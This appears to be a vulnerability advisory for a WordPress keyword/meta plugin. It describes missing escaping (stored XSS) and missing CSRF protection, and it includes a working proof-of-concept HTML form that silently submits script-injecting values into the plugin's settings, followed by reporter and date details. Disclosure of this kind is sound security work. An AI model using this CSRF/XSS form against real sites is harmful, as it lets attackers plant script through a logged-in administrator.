The plugin does not sanitise of escape its settings before outputting them back in the page after they are saved, allowing for Cross-Site Scripting issues. Furthermore, it is also lacking any CSRF check, allowing attacker to make a logged in high privilege user save arbitrary setting via a CSRF attack. Versions 3.1 & 3.2 added sanitisation/escaping, but still missing CSRF, the plugin has been permanently closed.
<html> <body> <form action="https://example.com/wp-admin/options-general.php?page=keyword-meta%2Fkeyword-meta.php" method="POST"> <input type="hidden" name="keywords_add" value="0" /> <input type="hidden" name="keywords_edit" value="" /> <input type="hidden" name="description_edit" value="</textarea><script>alert(/XSS-Desc/)</script>" /> <input type="hidden" name="og_enable" value="0" /> <input type="hidden" name="og_type_edit" value="0" /> <input type="hidden" name="og_title_all" value="0" /> <input type="hidden" name="og_url_edit" value="0" /> <input type="hidden" name="og_image_edit" value="0" /> <input type="hidden" name="og_image_all" value="0" /> <input type="hidden" name="apple_icon_edit" value="0" /> <input type="hidden" name="android_icon_edit" value="0" /> <input type="hidden" name="mobile_restrict_viewport" value="0" /> <input type="hidden" name="google_verify_edit" value='"><script>alert(/XSS-Goole-Code)</script>' /> <input type="submit" value="Submit request" /> </form> </body> </html>
Genubhau wayal
Genubhau Wayal
Yes
2021-08-09 (about 1 years ago)
2021-08-09 (about 1 years ago)
2022-04-12 (about 4 months ago)